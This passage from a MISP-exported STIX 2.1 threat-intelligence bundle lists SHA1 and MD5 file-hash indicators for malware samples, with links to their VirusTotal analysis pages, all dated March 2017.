"url--58db82d8-0aa0-4f68-88ee-45d602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82d8-0aa0-4f68-88ee-45d602de0b81",
|
|
"value": "https://www.virustotal.com/file/67a1dead18afc43c69a97de3e39bd84dec91df751a45bbda7ac5874f746c147c/analysis/1441529138/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82d9-b344-4870-91cd-4f6102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:09.000Z",
|
|
"modified": "2017-03-29T09:48:09.000Z",
|
|
"description": "Associated samples - Xchecked via VT: c4bc691d7b8a16ff68ed338878451d1ba681aa181922cabd0b999b935ded673e",
|
|
"pattern": "[file:hashes.SHA1 = 'e227d20d6e41e39e2a2574030aef21c897f891dc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82da-e578-4c19-a319-49e102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:10.000Z",
|
|
"modified": "2017-03-29T09:48:10.000Z",
|
|
"description": "Associated samples - Xchecked via VT: c4bc691d7b8a16ff68ed338878451d1ba681aa181922cabd0b999b935ded673e",
|
|
"pattern": "[file:hashes.MD5 = '366adb063e36b2c3b87b3ea8a0b602a6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82db-3ab8-4fad-a0d3-452802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:11.000Z",
|
|
"modified": "2017-03-29T09:48:11.000Z",
|
|
"first_observed": "2017-03-29T09:48:11Z",
|
|
"last_observed": "2017-03-29T09:48:11Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82db-3ab8-4fad-a0d3-452802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82db-3ab8-4fad-a0d3-452802de0b81",
|
|
"value": "https://www.virustotal.com/file/c4bc691d7b8a16ff68ed338878451d1ba681aa181922cabd0b999b935ded673e/analysis/1441092402/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82dc-2ee4-40b7-bd4a-4e3b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:12.000Z",
|
|
"modified": "2017-03-29T09:48:12.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 0f76bcda668095a8d2fe7a1282d463dcf04201e1c5a35856f117703bcd9428ef",
|
|
"pattern": "[file:hashes.SHA1 = 'ac729c8f7afe141dfe5ad178117d2f86de91e000']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82dd-80ac-4d0b-a97d-4e0902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:13.000Z",
|
|
"modified": "2017-03-29T09:48:13.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 0f76bcda668095a8d2fe7a1282d463dcf04201e1c5a35856f117703bcd9428ef",
|
|
"pattern": "[file:hashes.MD5 = '18588a286d613e4a0c791ca2678e3092']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82de-24d4-4174-b7bf-401502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:14.000Z",
|
|
"modified": "2017-03-29T09:48:14.000Z",
|
|
"first_observed": "2017-03-29T09:48:14Z",
|
|
"last_observed": "2017-03-29T09:48:14Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82de-24d4-4174-b7bf-401502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82de-24d4-4174-b7bf-401502de0b81",
|
|
"value": "https://www.virustotal.com/file/0f76bcda668095a8d2fe7a1282d463dcf04201e1c5a35856f117703bcd9428ef/analysis/1440888018/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82de-5e5c-4ad8-bc30-4b9002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:14.000Z",
|
|
"modified": "2017-03-29T09:48:14.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 222beafedbb604d200099cee657505f1d11b371403c7c9c12103adf28a561289",
|
|
"pattern": "[file:hashes.SHA1 = '744791257a05e18b6cef3a9db1b9ea2b09e9c822']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82df-0804-40e0-afae-412202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:15.000Z",
|
|
"modified": "2017-03-29T09:48:15.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 222beafedbb604d200099cee657505f1d11b371403c7c9c12103adf28a561289",
|
|
"pattern": "[file:hashes.MD5 = '535a92ba3d5fb903471eca5b46d2cf3d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82e0-648c-41fa-b808-4c0602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:16.000Z",
|
|
"modified": "2017-03-29T09:48:16.000Z",
|
|
"first_observed": "2017-03-29T09:48:16Z",
|
|
"last_observed": "2017-03-29T09:48:16Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82e0-648c-41fa-b808-4c0602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82e0-648c-41fa-b808-4c0602de0b81",
|
|
"value": "https://www.virustotal.com/file/222beafedbb604d200099cee657505f1d11b371403c7c9c12103adf28a561289/analysis/1446113714/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82e1-3884-4417-9a2a-4da602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:17.000Z",
|
|
"modified": "2017-03-29T09:48:17.000Z",
|
|
"description": "Associated samples - Xchecked via VT: caba117fdf3ca61b1b17121adb4546e829df5426ab8944e5c4672f4a8619d0fe",
|
|
"pattern": "[file:hashes.SHA1 = '1e397bced3e32c0988cf55d788693e9c62e31321']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82e2-2dac-4fa4-a207-431f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:18.000Z",
|
|
"modified": "2017-03-29T09:48:18.000Z",
|
|
"description": "Associated samples - Xchecked via VT: caba117fdf3ca61b1b17121adb4546e829df5426ab8944e5c4672f4a8619d0fe",
|
|
"pattern": "[file:hashes.MD5 = '203f4657ea2257b67cbaf7079145af2d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82e3-4da8-47b9-b9c9-471502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:19.000Z",
|
|
"modified": "2017-03-29T09:48:19.000Z",
|
|
"first_observed": "2017-03-29T09:48:19Z",
|
|
"last_observed": "2017-03-29T09:48:19Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82e3-4da8-47b9-b9c9-471502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82e3-4da8-47b9-b9c9-471502de0b81",
|
|
"value": "https://www.virustotal.com/file/caba117fdf3ca61b1b17121adb4546e829df5426ab8944e5c4672f4a8619d0fe/analysis/1445657308/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82e4-c6b4-4f2c-9d70-48f502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:20.000Z",
|
|
"modified": "2017-03-29T09:48:20.000Z",
|
|
"description": "Associated samples - Xchecked via VT: a4df4a25e847d95a86a257bef7d2b349e9908bec37f0199f9f217d9cc0e28564",
|
|
"pattern": "[file:hashes.SHA1 = 'b2064e968c472a620541c55435a7ef1c3b63aaa5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:20Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82e5-cd04-441a-b951-42dc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:21.000Z",
|
|
"modified": "2017-03-29T09:48:21.000Z",
|
|
"description": "Associated samples - Xchecked via VT: a4df4a25e847d95a86a257bef7d2b349e9908bec37f0199f9f217d9cc0e28564",
|
|
"pattern": "[file:hashes.MD5 = '0d0de540ea546da5b996855d9a7cdcb6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82e6-2cc8-4bea-a262-4df302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:22.000Z",
|
|
"modified": "2017-03-29T09:48:22.000Z",
|
|
"first_observed": "2017-03-29T09:48:22Z",
|
|
"last_observed": "2017-03-29T09:48:22Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82e6-2cc8-4bea-a262-4df302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82e6-2cc8-4bea-a262-4df302de0b81",
|
|
"value": "https://www.virustotal.com/file/a4df4a25e847d95a86a257bef7d2b349e9908bec37f0199f9f217d9cc0e28564/analysis/1434468279/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82e6-e584-45b0-b5c0-488a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:22.000Z",
|
|
"modified": "2017-03-29T09:48:22.000Z",
|
|
"description": "Associated samples - Xchecked via VT: b6dc94f75ea4d2b46cf41079b1ac4cf48fe7786019396f379822fe6e21c9929d",
|
|
"pattern": "[file:hashes.SHA1 = '5b073e0105d33822a4ea81a6216b04d00981527c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82e7-0e98-4e74-9729-440302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:23.000Z",
|
|
"modified": "2017-03-29T09:48:23.000Z",
|
|
"description": "Associated samples - Xchecked via VT: b6dc94f75ea4d2b46cf41079b1ac4cf48fe7786019396f379822fe6e21c9929d",
|
|
"pattern": "[file:hashes.MD5 = '4dbba723308c0d39ce6374832c0aefce']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:23Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82e8-cb54-4a71-8d37-437802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:24.000Z",
|
|
"modified": "2017-03-29T09:48:24.000Z",
|
|
"first_observed": "2017-03-29T09:48:24Z",
|
|
"last_observed": "2017-03-29T09:48:24Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82e8-cb54-4a71-8d37-437802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82e8-cb54-4a71-8d37-437802de0b81",
|
|
"value": "https://www.virustotal.com/file/b6dc94f75ea4d2b46cf41079b1ac4cf48fe7786019396f379822fe6e21c9929d/analysis/1434468269/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82e9-aa34-4073-9eb0-48f702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:25.000Z",
|
|
"modified": "2017-03-29T09:48:25.000Z",
|
|
"description": "Associated samples - Xchecked via VT: d99c699e399afcd9e5abcff8c9b4a40af3e428f0c452c646653c79ec1a623bba",
|
|
"pattern": "[file:hashes.SHA1 = '11c44adcf0c6711ac7588e491b1ac164b32d1ce9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ea-0f78-4f33-9b73-456402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:26.000Z",
|
|
"modified": "2017-03-29T09:48:26.000Z",
|
|
"description": "Associated samples - Xchecked via VT: d99c699e399afcd9e5abcff8c9b4a40af3e428f0c452c646653c79ec1a623bba",
|
|
"pattern": "[file:hashes.MD5 = 'fbf5e9cc523cd5d86f3800733202c154']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:26Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82eb-1adc-4be8-a7e7-4a8002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:27.000Z",
|
|
"modified": "2017-03-29T09:48:27.000Z",
|
|
"first_observed": "2017-03-29T09:48:27Z",
|
|
"last_observed": "2017-03-29T09:48:27Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82eb-1adc-4be8-a7e7-4a8002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82eb-1adc-4be8-a7e7-4a8002de0b81",
|
|
"value": "https://www.virustotal.com/file/d99c699e399afcd9e5abcff8c9b4a40af3e428f0c452c646653c79ec1a623bba/analysis/1437031771/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ec-59cc-44f4-aebd-48f802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:28.000Z",
|
|
"modified": "2017-03-29T09:48:28.000Z",
|
|
"description": "Associated samples - Xchecked via VT: e47ce23ec14114d3abeba090baa77b9bec876f947df67076dddb9087387735c7",
|
|
"pattern": "[file:hashes.SHA1 = 'febb09fd2ea56f8dad2a0e623b55a5ce28e27405']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ed-9e84-4676-8235-471f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:29.000Z",
|
|
"modified": "2017-03-29T09:48:29.000Z",
|
|
"description": "Associated samples - Xchecked via VT: e47ce23ec14114d3abeba090baa77b9bec876f947df67076dddb9087387735c7",
|
|
"pattern": "[file:hashes.MD5 = '59f84f7e47fd6d8e78461e4e46f9cbce']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82ee-ee40-43d9-b128-47f502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:30.000Z",
|
|
"modified": "2017-03-29T09:48:30.000Z",
|
|
"first_observed": "2017-03-29T09:48:30Z",
|
|
"last_observed": "2017-03-29T09:48:30Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82ee-ee40-43d9-b128-47f502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82ee-ee40-43d9-b128-47f502de0b81",
|
|
"value": "https://www.virustotal.com/file/e47ce23ec14114d3abeba090baa77b9bec876f947df67076dddb9087387735c7/analysis/1434392907/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ee-3c84-4cb4-9c55-4cb902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:30.000Z",
|
|
"modified": "2017-03-29T09:48:30.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 4b10cc374ed9e2c69231fcfa1b1d96496785ecf148f9445192f24385068e7b0c",
|
|
"pattern": "[file:hashes.SHA1 = '14fbc9271b3c54bda6c0eb00fc8d7944d9b2b66f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ef-66e8-4a1a-b5e9-49d302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:31.000Z",
|
|
"modified": "2017-03-29T09:48:31.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 4b10cc374ed9e2c69231fcfa1b1d96496785ecf148f9445192f24385068e7b0c",
|
|
"pattern": "[file:hashes.MD5 = '0ace8f0976d5ceb554cdd5e26723528f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82f0-637c-4fb1-9806-44a902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:32.000Z",
|
|
"modified": "2017-03-29T09:48:32.000Z",
|
|
"first_observed": "2017-03-29T09:48:32Z",
|
|
"last_observed": "2017-03-29T09:48:32Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82f0-637c-4fb1-9806-44a902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82f0-637c-4fb1-9806-44a902de0b81",
|
|
"value": "https://www.virustotal.com/file/4b10cc374ed9e2c69231fcfa1b1d96496785ecf148f9445192f24385068e7b0c/analysis/1455853300/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82f1-6e0c-47b7-a61e-44ab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:33.000Z",
|
|
"modified": "2017-03-29T09:48:33.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 1b5e57fa264b2ce145b39f9fc2279b21f6b212aeca8eaa27f68cdcdbdef1900f",
|
|
"pattern": "[file:hashes.SHA1 = '8f8e2ae983658f2f1a7b8289d80801cca00d5655']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82f2-0e20-4ec9-8b8c-4f8502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:34.000Z",
|
|
"modified": "2017-03-29T09:48:34.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 1b5e57fa264b2ce145b39f9fc2279b21f6b212aeca8eaa27f68cdcdbdef1900f",
|
|
"pattern": "[file:hashes.MD5 = '9a07ddcaf33434fd3e0280bdd5ce03c9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82f3-f4e8-4f66-a17d-483d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:35.000Z",
|
|
"modified": "2017-03-29T09:48:35.000Z",
|
|
